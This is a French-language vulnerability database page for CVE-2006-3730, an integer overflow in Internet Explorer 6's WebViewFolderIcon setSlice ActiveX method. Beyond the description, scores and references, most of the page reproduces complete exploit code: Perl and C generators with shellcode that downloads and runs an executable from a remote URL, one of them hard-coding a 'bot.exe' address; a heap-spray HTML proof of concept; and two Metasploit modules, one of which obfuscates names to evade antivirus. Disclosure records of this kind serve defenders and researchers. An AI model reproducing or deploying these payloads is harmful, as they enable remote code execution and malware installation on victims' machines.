CVE-2006-3730 : Détail

CVE-2006-3730

Code Injection
A03-Injection
88.31%V4
Network
2006-07-19
21h00 +00:00
2018-10-17
18h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 2458

Date de publication : 2006-09-28 22h00 +00:00
Auteur : YAG KOHHA
EDB Vérifié : Yes

#!/usr/bin/perl # # Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC # # Author: Vampyroteuthis Infernalis <skyhole [at] gmail.com> # Greetz: H D Moor, Dark Eagle, Jamikazu # # use strict; my $sco = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03". "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". "http://dedicated.com/bot.exe"; my $war_code= convert_sco($sco); my @exploit_body=<<FOOKER; <HTML> <BODY> <SCRIPT language="javascript"> var heapSprayToAddress = 0x05050505; var infernalis_ = unescape("%u9090%u9090$war_code"); var heapBlockSize = 0x400000; var payLoadSize = infernalis_.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0505%u0505"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + infernalis_; } for ( i = 0 ; i < 128 ; i++) { try{ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); }catch(e){} } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </SCRIPT> </BODY> </HTML> FOOKER open (IE_VML, ">", "exploit.html"); print IE_VML @exploit_body; close IE_VML; sub convert_sco { my $data = shift; my $mode = shift() || 'LE'; my $code = ''; my $idx = 0; if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); } while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%.2x%.2x', $c2, $c1); } else { $code .= sprintf('%%u%.2x%.2x', $c1, $c2); } $idx += 2; } return $code; } # milw0rm.com [2006-09-29]
Exploit Database EDB-ID : 2460

Date de publication : 2006-09-28 22h00 +00:00
Auteur : LukeHack
EDB Vérifié : Yes

/* *----------------------------------------------------------------------- * * Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) * Works on all Windows XP versions including SP2 * * Author: LukeHack * Mail: lukehack@fastwebnet.it * * Bug discovered by Computer H D Moore (http://www.metasploit.com) * * Credit: metasploit, jamikazu, yag kohna(for the shellcode) * * : * Tested : * : Windows XP SP2 + Internet Explorer 6.0 SP1 * : * Complie : cl pociewvf.c * : * Usage : c:\>pociewvf * : * :Usage: pociewvf <exe_URL> [htmlfile] * : * * *------------------------------------------------------------------------ */ #include <stdio.h> #include <stdlib.h> #include <string.h> FILE *fp = NULL; char *file = "lukehack.htm"; char *url = NULL; unsigned char sc[] = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; char * header = "<html>\n" "<body>\n" "<script>\n" "\tvar heapSprayToAddress = 0x05050505;\n" "\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n"; char * footer = "var heapBlockSize = 0x400000;\n" "var payLoadSize = shellcode.length * 2;\n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n" "var spraySlide = unescape(\"%u0505%u0505\");\n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n" "heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\n" "memory = new Array();\n\n" "for (i=0;i<heapBlocks;i++)\n{\n" "\t\tmemory[i] = spraySlide + shellcode;\n}\n" "for ( i = 0 ; i < 128 ; i++)\n{\n\t" "try\n\t{\n\t\tvar tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');\n" "\t\ttar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );\n" "\t}\n\tcatch(e){}\n}\n\n" "function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t" "while (spraySlide.length*2<spraySlideSize)\n\t" "{\n\t\tspraySlide += spraySlide;\n\t}\n" "\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n" "</script>\n" "</body>\n" "</html>\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; if (argc < 2) { printf("Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)\n"); printf("Code by LukeHack\n"); printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url)+1; PrintPayLoad(buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); printf("[+] exploit write to %s success!\n", file); } // LukeHack coded it! // milw0rm.com [2006-09-29]
Exploit Database EDB-ID : 2448

Date de publication : 2006-09-27 22h00 +00:00
Auteur : jamikazu
EDB Vérifié : Yes

<!-- ..::[ jamikazu presents ]::.. Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) Works on all Windows XP versions including SP2 Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by Computer H D Moore (http://www.metasploit.com) Credit: metasploit, SkyLined invokes calc.exe if successful --> <HTML> <BODY> <SCRIPT language="javascript"> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape( "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0505%u0505"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } for ( i = 0 ; i < 128 ; i++) { try{ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); }catch(e){} } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </SCRIPT> </BODY> </HTML> # milw0rm.com [2006-09-28]
Exploit Database EDB-ID : 2440

Date de publication : 2006-09-26 22h00 +00:00
Auteur : H D Moore
EDB Vérifié : Yes

# This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/ require 'msf/core' module Msf class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 3783 $', 'References' => [ [ 'OSVDB', '27110' ], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | # Randomize the whitespace in the document content.gsub!(/\s+/) do |s| len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, content) end end end # milw0rm.com [2006-09-27]
Exploit Database EDB-ID : 16564

Date de publication : 2010-07-02 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2006-3730'], [ 'OSVDB', '27110' ], [ 'MSB', 'MS06-057'], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 17 2006')) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = rand_text_alpha(rand(30)+2) var_shellcode = rand_text_alpha(rand(30)+2) var_unescape = rand_text_alpha(rand(30)+2) var_x = rand_text_alpha(rand(30)+2) var_i = rand_text_alpha(rand(30)+2) var_tic = rand_text_alpha(rand(30)+2) var_toc = rand_text_alpha(rand(30)+2) # Annoying AVs var_aname = "==QMu42bjlkclRGbvZ0dllmViV2Vu42bjlkclRGbvZ0dllmViV2V".reverse.unpack("m*")[0] var_ameth = "=U2Ypx2U0V2c".reverse.unpack("m*")[0] # Randomize HTML data html = rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( '#{var_aname}' ); try { #{var_tic}.#{var_ameth}( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( '#{var_aname}' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | content = Rex::Text.randomize_space(content) print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 6.0

    Microsoft>>Internet_explorer >> Version 6.0

    Microsoft>>Windows_xp >> Version *

    Références

    http://securitytracker.com/id?1016941
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.us-cert.gov/cas/techalerts/TA06-283A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.us-cert.gov/cas/techalerts/TA06-270A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.kb.cert.org/vuls/id/753044
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.osvdb.org/27110
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.securityfocus.com/bid/19030
    Tags : vdb-entry, x_refsource_BID
    http://www.vupen.com/english/advisories/2006/2882
    Tags : vdb-entry, x_refsource_VUPEN
    https://www.exploit-db.com/exploits/2440
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://secunia.com/advisories/22159
    Tags : third-party-advisory, x_refsource_SECUNIA